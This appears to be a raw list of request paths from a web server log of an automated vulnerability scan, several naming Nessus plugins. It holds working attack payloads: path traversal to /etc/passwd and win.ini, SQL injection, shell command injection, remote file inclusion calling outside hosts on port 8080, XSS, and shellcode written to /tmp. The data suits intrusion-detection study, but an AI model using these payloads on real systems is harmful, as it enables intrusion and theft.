/g3w7y7u5.htm?
/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/whmch8ftkt7kv?
/scripts/apgafvcxoeeh.html
/examples/jsp/cal/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd
/odzk29aa.cfc?
/scripts/shop.plx/page=nessus394221529
/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=head
/rbec2ohx.pl?
/examples/jsp/jsp2/jspx/index.php?op=default&date=200607' union select 1,1908404704,1,1,1,1,1,1,1,1--&blogid=1
/index.php?op=default&date=200607' union select 1,240520592,1,1,1,1,1,1,1,1--&blogid=1
/jackrabbit/search.jsp?q=%"
/top.php?stuff=';uname #
/fa8p8lr8.kspx?
/main.php?stuff="ping,-w,9000,-n,1,1.2.3.4&rem,
/miz4r5hz.fts?
/examples/jsp/colors/protection.php?action=logout&siteurl=/etc/passwd
/examples/jsp/error/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|
/recordings/admin/admin.php?sid='
/psynch/nph-psf.exe?css=http://192.168.202.96:8080/4dckqcc0acprbz?
/yver8r9o.do?
/javascript/page_1.exe
/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.1
/examples/jsp/colors/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/l752x1ry.x?
/5qnlm5z2.nsf?
/iktok2bw.htm?
/
/javascript/tool.exe
/servlet/contentserver?pagename=
/examples/jsp/jsp2/el/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/zv8tv7h8.aspx?
/examples/jsp/jsp2/jspx/search=
/main.php?logout="rm\xa0q91628118&rem\xa0
/iv5vkgam.htm?
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl?
/jdx255ea.dll?
/javascript/cert.exe
/manager/topic.php?tid='select
/main.php?stuff='\x0adel\x09q13973431\x09#
/help.php?q="\x0auname #
/accessplatform/auth/clientscripts/
/script/ident/disconnect.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/2aibfaczmac8?
/l752x1ry.htm?
/javascript/dll.exe
/scripts/index.php?op=default&date=200607' union select 1,1409814507,1,1,1,1,1,1,1,1--&blogid=1
/examples/jsp/checkbox/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
/edv3mapy.php?
/phpmyadmin/athenareg.php?pass= ;id
/top.php?stuff=";rm q17551646 #
/vjbrrppi.htm?
/mpcgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/eclxssapp/
/module/forum/forum.php?fd=http://192.168.202.118:8080/2aibfaczmac8?=';
/javascript/privacy.exe
/javascript/webcart.exe
/cgi-bin/fxm.exe
/top.php?stuff="ping,-w,8000,-n,1,1.2.3.4|rem,
/vmi8bb12.cgi?
/help.php?q='&sleep\x099\x09#
/addvip.php?msetstr["progsdir"]=http://192.168.202.118:8080/ghl9il?
/\..\..\..\..\..\..\..\..\..\winnt\win.ini
/main.php?stuff='\x0duname >q64854395 #
/examples/jsp/jsp2/el/webadmin.php?show=/etc/passwd
/main.php?logout="rm\x09q51755129&rem\x09
/u95h6ymu.pl?
/d5a5renl.idc?
/examples/jsp/error/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
/3hlysl2x.dll?
/en-us/account/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/nuh3zirz.pl?
/javascript/graphics.exe
/cgi-bin/cwmail.exe
/javascript/procure.exe
/java-script/
/scripts/phpping/index.php?pingto=www.nessus.org | dir
/gascripts/
/gvx7m5ti.htm?
/cgi-exe/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/top.php?stuff="rm\xa0q29642432&rem\xa0
/help.php?q=/'
/scgi-bin/vssetcookie.exe
/top.php?stuff=;rm q28242581 #
/cacti/forum.php?do=viewtopic&cat=1&topic=1&page=1?>ctdn
/en-us/account/usrdetails.php?sgnuptype=csaleid
/prescription_drugs/
/edzaia0i.dll?
/javascript/servers.exe
/8t9v8k7x.do?
/manager/htmlscript?../../../../../../../../../etc/passwd
/examples/servlets/servlet/secure.php?cfgprogdir=/etc/passwd\x00
/htbin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/javascript/jp.exe
/nuh3zirz.x?
/vac1l5vm.pl?
/ladies of the 80's_ladies of the 80'smp3/
/javascript/access.1.exe
/viewnewspapers.asp?newspaperid=123456'
/de3v2dd9.php?
/m4kkjf8l.jspa?
/examples/jsp/cal/review.php?id=1&cat=&subcat=">
/j4drbkil.jsp?
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904226
/oie504mr.cfc?
/cgi-bin/htsearch.cgi?words=">
/main.php?stuff=';sleep\x099\x09#
/main.php?logout="&rm;q21715323&rem;
/help.php?q="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/main.php?stuff='&rm\x09q84519525\x09#
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/fppatbfqdp;"
/javascript/reversed.exe
/phpmyadmin/admin/admin.php?sid='
/examples/jsp/jsp2/el/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/main.php?stuff='\x0duname >q65565224 #
/3m5knyc4.aspx?
/main.php?stuff='\x0ddel\x09q27918964\x09#
/cgi-bin/rot13sj.cgi?/etc/passwd
/scripts/calendar.php?month=' union select 1,1,'1331908849','calendarix_month_sql_injection.nasl',1 #
/en-us/account/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=q66642634&scr_height=&scr_width=
/xfkun1ku.htm?
/examples/jsp/colors/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00
/scripts/login.php
/scripts/includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/
/scripts/event_view.php?eid=34 union select 688985287
/j4drbkil.aspx?
/en-us/odzk29aa.exe?
/help.php?q='&uname >q85582565 #
/b1q8bywu.jsp?
/111-scriptome/
/examples/jsp/jsp2/jspx/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd
/_mem_bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/en-us/33y9gcqq.dll?
/n1afe1y6.cfm?
/main.php?logout=;del q17429254 #
/cgi-915/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/en-us/h5sc3gxy.html?
/javascript/wsdl.exe
/scripts/vote.cgi
/zv8tv7h8.x?
/search.jsp?q=%"
/en-us/odzk29aa.aspx?
/scripts/whois_raw.cgi?fqdn=\x0aid
/5qnlm5z2.x?
/phpmyadmin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
/ao22ww7y.fts?
/admin/config.php?display=did&rnavsort=description
/examples/servlets/servlet/shared/help.php?page=../../../../../../../../../../etc/passwd\x00
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0250\0312\0211\0340j\0020pr" >> /tmp/vsnlklmgzu0;echo|awstats748737.txt
/examples/jsp/cal/view_user.php?list=1&letter=&sort_by='select
/ecmascript/
/sys/code/box.inc.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz?
/vii-ppp-scripts/
/examples/jsp/num/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/help.php?q="ver >q98145633&rem
/static//../../../../../../../../windows/win.ini\x00
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt?
/examples/servlets/servlet/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 --
/main.php?stuff="ver;>q25586458&rem;
/javascript/tiles.exe
/scripts/2pwudii1mt22.cgi
/examples/servlets/servlet/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/jw64yq8u.php3?
/index.php?op=default&date=200607' union select 1,793421908,1,1,1,1,1,1,1,1--&blogid=1
/en-us/account/index.php?src=1&_common=1&time=1331909414&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/main.php?stuff=|ping;-w;11000;-n;1;4.3.2.1|rem;
/script-installation/
/cgi-local/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/examples/jsp/colors/index.php?id='union/**/select/**/0,0,1917618887,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/scripts/2pwudii1mt22.inc
/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/examples/jsp/colors/wordtrans.php?command=show_desc&advanced=1";id; true "
/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/examples/jsp/num/search.php?submit=true&search=');
/javascript/records.exe
/recordings/admin/admin.php?sid=0'
/examples/jsp/colors/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00
/jujgxwav.kspx?
/cgi-bin/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/cacti/calendar_admin.pl?config=|cat /etc/passwd|
/scripts/h3d1n9eaqxv3.shtml
/help.php?q="\x0dsleep 8 #
/cgi-win/cgi-test.exe
/examples/jsp/jsp2/el/texis.exe/?-dump
/phpmyadmin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
/odzk29aa.fts?
/javascript/ex.exe
/help.php?q='\x0dsleep 7 #
/rv98iwjp.jspa?
/nyjgaorz.aspx?
/drhcprxk.htpasswd
/qb2xy9aw.html?
/javascript/opendir.exe
/examples/jsp/error/ion-p.exe?page=c:\\winnt\\win.ini
/cgi.cgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/scripts/ui/login?user=nessus-1331904327
/vmi8bb12.idc?
/news_script/
/main.php?logout="&ver&rem\x0c
/javascript/cc.exe
/phpmyadmin.exe
/examples/jsp/error/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00
/ovcgi/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
//
/new-year's/
/b5xdqgz2.pl?
/top.php?stuff=del;q99348313&rem;
/manager/docs.php?doc=../jpgraph-1.12.1/docs/index
/month.exe
ftp://192.168.24.203/*
/main.php?stuff="&del\xa0q78321413&rem\xa0
/uvazfs7p.php?
/javascript/scan.exe
/jujgxwav.php?
/javascript/pos.exe
/examples/jsp/num/webadmin.php?show=/etc/passwd
/en-us/account/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=
/main.php?logout="ping,-w,10000,-n,1,4.3.2.1|rem,
/t7tm4m0b.php?
/javascript/form.exe
/main.php?logout='&sleep 9 #
/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/zz5thkvtmlgl??
/examples/servlets/servlet/index.php?op=default&date=200607' union select 1,106876795,1,1,1,1,1,1,1,1--&blogid=1
/javascript/sam.exe
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
/iajtej82.x?
/main.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/script2/
/scripts/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/rubrique.asp?no=c:\boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'c:'.
/ygkjkngd.cfm?
/javascript/ver1.exe
/scripts/t99iadgtkf9h.html
/init.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??
/m5103snj.cgi?
/examples/jsp/jsp2/jspx/home/search.asp?nchannel='1
/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/javascript/evt.exe
/javascript/cgibin.exe
/javascript/hop.exe
/cgi-bin/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">
/wasdscripts172-ia64/
/phpmyadmin//................etc/passwd
/help.php?q=';uname\x09#
/examples/jsp/error/search=
/g3w7y7u5.aspx?
/rpc/..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
/8x6w469u.html?
/examples/jsp/error/login.php?user=">
/t7tm4m0b.x?
/examples/jsp/cal/main.php?g2_itemid=../../../../../license\x00
/zuihld5m.fts?
/help.php?q="del\xa0q71425977&rem\xa0
/en-us/odzk29aa.cfm?
/javascript/.htaccess/'"'"'"'"
/de3v2dd9.php3?
/help.php?q="|ping\x09-w\x097000\x09-n\x091\x091.2.3.4|rem\x09
/en-us/fo564rei.exe?
/setup/setup-/../../log.jsp?log=info&mode=asc&lines=10
/examples/servlets/servlet/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login
/cgi.cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q66155717
/javascript/faqs.exe
/slscript/
/phpmyadmin/sgdynamo.exe?htname=
/javascript/signed.exe
/xsqln7eb.pl?
/en-us/i686v90l.cfm?
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/cgi-local/listrec.pl?app=qmh-news&template=;ls /etc|
/scripts/gdxlwjnlsr6i.sh
/d7ktpmcq.cgi?
/examples/jsp/error/javascript.php?abs_path=/etc/passwd\x00
/en-us/oie504mr.pl?
/fmnveedu.html?
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/wrkvkjjzem0;echo|awstats648649.txt
/recordings/sawmillcl.exe?ho+{complete_version}
/passwd-safe/
/manager/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog
/iv5vkgam.dll?
/examples/jsp/jsp2/el/check_user_id.php?user_id=
/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/javascript/inbound.exe
/phpmyadmin///../../../../../../../..etc/passwd
/cgibin/sensepost.exe?/c+dir
/zv8tv7h8.mscgi?
/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/uvazfs7p.kspx?
/scripts/search.cgi?..\..\..\..\..\..\windows\win.ini
/scripts/mt/
/b1q8bywu.exe?
/help.php?q='\x0duname\x09>q63353886\x09#
/g8nu2yy7.exe?
/tramadol-prescription/
/examples/jsp/jsp2/jspx/webplus.exe?script=webplus_install_path.nasl
/cacti/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/nuh3zirz.cgi?
/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/moclyxlwqyfjnp??
/subscriptions.test
/manager/listrec.pl?app=qmh-news&template=;ls /etc|
/main.php?stuff="&ver\x09>q48424932&rem\x09
/examples/jsp/cal/phptonuke.php?filnavn=/etc/passwd
/test.php?evalme=eval($_server[http_x_mbnqgczvafwyars]);
/scripts/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00
/examples/jsp/sessions/config.php?returnpath=/etc/passwd\x00
/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\x00
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+debug
/iajtej82.htm?
/fc9t54l7.idc?
/rpxyx07v.fts?
/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd\x00
/nsn/..\util/slist.bas
/en-us/i686v90l.exe?
/examples/jsp/sessions/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/j734qobz.asp?
/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/zz5thkvtmlgl?
/top.php?stuff="ping,-w,11000,-n,1,1.2.3.4&rem,
/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp??
/queen's-quest/
/jnt3f86c.fts?
/phpmyadmin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/e9rx3ya4.x?
/javascript/sunos.exe
/examples/jsp/jsp2/el/index.php?sensor_program=
/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat /etc/passwd|
/javascript/charge.exe
/help.php?q="&ping,-w,7000,-n,1,4.3.2.1&rem,
/scripts/webc.cgi/
/examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,1843478711,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/examples/jsp/sessions/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h
/examples/jsp/checkbox/review.php?id=1&cat=&subcat=">
/examples/jsp/checkbox/protection.php?action=logout&siteurl=/etc/passwd
/help.php?q=";del q19897274 #
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/whmch8ftkt7kv?
/3hlysl2x.cgi?
/recordings/activatemember?activatecode=&member=">
/top.php?stuff="&rm\x09q43482464&rem\x09
/hipkz026.pl?
/manager/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00
/n1afe1y6.x?
/apavxugx.kspx?
/javascript/system.exe
/admin/geo_zones.php?zone=
/main.php?stuff="|ping;-w;9000;-n;1;1.2.3.4|rem;
/top.php?stuff="&del\x0bq71858742&rem\x0b
/forums/index.php?top_message=<script>alert(document.cookie)</script>
/scripts/h3d1n9eaqxv3.cgi
/cacti/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/scripts/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_8ypa_2_i]));die;/*
/exchange/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
/scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=
/gy23xnjq.pl?
/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2
/javascript/pipe.exe
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+64+6c+6c+20+47+65+74+50+72+6f+63+41+64+64+72+65+73+73+4c+6f+61+64+4c+69+62++>>esbq
/examples/jsp/sessions/index.php?mod_id=2&kb_ask=
/administrator/upload.php?newbanner=1&choice=\"
/main.php?logout="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/fnwhrxyd.exe?
/examples/jsp/checkbox/session/login.php?dest=nessus">">'>'"
/webcalendar/colors.php?color=
/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.96:8080/4dckqcc0acprbz??
/scripts/admin/users.php
/quagynka.nsf?
/main.php?stuff=1985387140' and 1=1 and ''<>'bvys4izi
/javascript/.htaccess.sfish/"`uname`"
/subscriptionhomepage/
/3j8echh0.htm?
/bn857frh.idc?
/javascript/htpasswd.xslt
/javascript/ms.exe
/john battelle's searchblog/
/s7qus4g3.htm?
/scripts/c/portal/login
/ygkjkngd.dll?
/zln2hm2z.php?
/top.php?stuff=uname\x09>q38266346\x09#
/webtop/wdk/samples/dumprequest.jsp?j=f
/copying/
/o1zj4u9v.html?
/javascript/.passwd.jsf
/3m5knyc4.fts?
/examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/qczkquis.jsp?
/bxnyrhmh.exe?
/javascript/digg.exe
/examples/servlets/servlet/index.php?user_langue=../../../../../../../../../../etc/passwd
/help.php?q="ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/
/j4oqyvga.mscgi?
/nuh3zirz.do?
/scripts/remindpasswd
/examples/jsp/sessions/sources/functions.php?root_path=/etc/passwd\x00
/phpmyadmin/awstatstotals.php?sort="].phpinfo().exit().$a["
/javascript/dialog.exe
/examples/jsp/cal/calendar.php?serverpath=/etc/passwd\x00
/20040209_transcript/
/top.php?stuff="ping;-w;10000;-n;1;4.3.2.1&rem;
/manager/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/main.php?logout=&uname >q27658181 #
/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904472.php.
/examples/jsp/jsp2/jspx/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/t578vqea.x?
/phpmyadmin/review.php?id=1&cat=&subcat=">
/gw5/gwweb.exe?help=bad-request
/main.php?logout="|ping;-w;9000;-n;1;4.3.2.1|rem;
/javascript/dialogs.exe
/scripts/help.php
/quagynka.jsp?
/edzaia0i.php?
/uc3w3bdi.php3?
/ows-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/examples/jsp/sessions/admin/admin.php?sid=0'
/javascript/diffs.exe
/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?
/vmi8bb12.x?
/main.php?logout="rm\x09q74671245\x09#
/en-us/manager/search/data/inputs/script
/archive.php?scriptpath=http://192.168.202.96:8080/txenjrxf3??
/scripts/buoalakxhatu.cfm
/examples/jsp/checkbox/whois.cgi?action=load&whois=;id
/main.php?stuff="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
/subscriptionscenter/
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/txenjrxf3??
/javascript/trees.exe
/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 --
/en-us/h5sc3gxy.asp?
/examples/jsp/cal/search=
/examples/jsp/jsp2/el/showcat.php?cat=1'
/dslpwt15.kspx?
/examples/jsp/jsp2/jspx/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/2aibfaczmac8??
/top.php?stuff="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c
/top.php?stuff=;rm\x09q51161767\x09#
/fmnveedu.html?
/examples/jsp/checkbox/javascript.php?abs_path=/etc/passwd\x00
/e9rx3ya4.cgi?
/main.php?logout="ping,-w,11000,-n,1,4.3.2.1|rem,
/javascript/.htpasswd.sfish/"`uname`"
/examples/jsp/sessions/cal_week.php?op=week&catview=999'
/manager/hw3.cgi?daysonly=0).system('id').(
/main.php?logout=ver >q98354754&rem
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/zz5thkvtmlgl??
/gvx7m5ti.nsf?
/cgi-bin/bsguest.cgi?email=x;ls
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/urcppbumwm0;echo|awstats447671.txt
/crystalreportwebformviewer2/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/scripts/index.php?cat_select=
/examples/jsp/jsp2/el/search.cgi?..\..\..\..\..\..\winnt\win.ini
/eei78ore.asp?
/examples/jsp/cal/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/scripts/wspd_cgi.sh/wservice=wsbroker1/webutil/ping.p
/scripts/verify.asp?username='
/inc/formmail.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3?
/phpmyadmin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm??cmd=id;pwd
/phpmyadmin/sendcard.php?view=1&id='sendcard_sql.nasl
/index.html?urlmaskfilter=
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=q89818741&scr_width=
/t7tm4m0b.x?
/examples/jsp/num/wordtrans.php?command=show_desc&advanced=1";id; true "
/help.php?q="&ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09
/6n7aacgg.jspa?
/script11/
/javascript/simple.exe
/addvip.php?msetstr[\"progsdir\"]=http://cirt.net/rfiinc.txt?
/examples/jsp/error/index.php?search=
/help.php?q=ver\x0b>q19552399&rem\x0b
/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8??
/top.php?stuff="rm\xa0q69465625&rem\xa0
/g3w7y7u5.nsf?
/examples/jsp/error/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/mpcgi/.htpasswd
/b1q8bywu.php3?
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q43818971&frm_user=&scr_height=&scr_width=
/main.php?stuff='&del q78458992 #
/j4oqyvga.x?
/whatisscriptingnews/
/help.php?q=';uname\x09>q85144243\x09#
/scripts/search.jsp?q=%"
/manager/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
/cgi-bin/search.jsp?q=%"
/clk;38417398;7163019;r/
/scripts/gdxlwjnlsr6i.pl
/search.jsp?q=%"
/en-us/h5sc3gxy.idc?
/javascript/tracks.exe
ftp://192.168.25.103/*
/examples/jsp/jsp2/el/shopexd.asp?catalogid='42
/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/javascript/listinfo.exe
/xlj7h65o.htm?
/byrg33fw.cgi?
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201
/examples/jsp/jsp2/el/sendtemp.pl?templ=../../../../../etc/passwd
/cgi-perl/testcgi.exe
/henry d'allemagne polichinelle et son v??locip??de /
/fa8p8lr8.do?
/top.php?stuff=^'
/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/microsoft office 2007 suite's + add on programs/
/scripts/lce0cbkfb8xx.php
/i7prbs22.cfm?
/examples/jsp/jsp2/el/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/cgi-bin/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
/..\..\..\..\..\..\..\..\..\..\windows\win.ini
/subscription_promotion/
/e9rx3ya4.pl?
/cgi-bin/cslivesupport.cgi?command=savesetup&setup=;system('cat /etc/passwd')
/javascript/clicks.exe
/mv8wxfy9.fts?
/scripts/story.pl?next=../../../../../etc/passwd\x00
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010406,1,1928557356--
/help.php?q=&del;q15387485&rem;
/cacti/include/config_settings.php?config[include_path]=/etc/passwd\x00
/cgis/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/main.php?stuff="ping,-w,11000,-n,1,1.2.3.4&rem,
/etree-scripts/
/magician's/
/examples/jsp/checkbox/direct.php?rf=/etc/passwd\x00
/a0imiuf1.php?
/phpmyadmin/kb.cgi?view='&lang=en
/recordings/config.php?path[docroot]=/etc/passwd\x00
/bzuf9ozq.cgi?
/azcrfs8d.html?
/n1afe1y6.cfc?
/javascript/lock.exe
/search/submit.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt?
/now that's what i call xmas - 3cd's/
/byrg33fw.cfc?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+0c+20+ae+75+e9+e2+f7+8b+73+18+8d+45+0d+50+6a+0e+e8+18+00+00+00+50+8d+45+1b++>>esbq
/javascript/.htpasswd.sfish/9 1 -
/scripts_1/
/d7ktpmcq.kspx?
/ydexw8by.php3?
/examples/jsp/jsp2/jspx/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/cacti/viewpage.php?file=/etc/passwd
/rv98iwjp.kspx?
/phorum/admin/footer.php?globals[message]=
/bxnyrhmh.nsf?
/cgi-bin/index.php?id=urjhxcl19w'
/examples/jsp/checkbox/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/checkbox/perl.exe?-v
/scripts/hints.pl?|id|
/javascript/daemon.exe
/nmw0do67.pl?
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/en-us/i686v90l.nsf?
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00
/shell_script/
/cgi.cgi/vssetcookie.exe
/scripts/nbmember.cgi?cmd=test
/help.php?q="\x0drm\x09q76412123\x09#
/javascript/htpasswd.php
/scriptv0105192/
/help.php?q=";uname >q69686889 #
/main.php
/en-us/fo564rei.dll?
/examples/jsp/sessions/bb-hist.sh?histfile=../../../../../etc/passwd
/javascript/closed.exe
/i686v90l.html?
/mv8wxfy9.fts?
/help.php?q="&rm q11415113 #
/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/llumt7msyau5y??&cmd=id
/h4bi26jd.idc?
/help.php?q='&uname >q67988136 #
/recordings/search/show.pl?url=file:/etc/passwd
/help.php?q='\x0arm\x09q47355772\x09#
/169okeyj.jsp?
/inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3?
/top.php?stuff="rm q61611865&rem
/upload.php?type=\"
/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
/examples/jsp/num/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/main.php?stuff="&del\xa0q65461871&rem\xa0
/en-us/33y9gcqq.nsf?
/javascript/wp-login.exe
/mv8wxfy9.do?
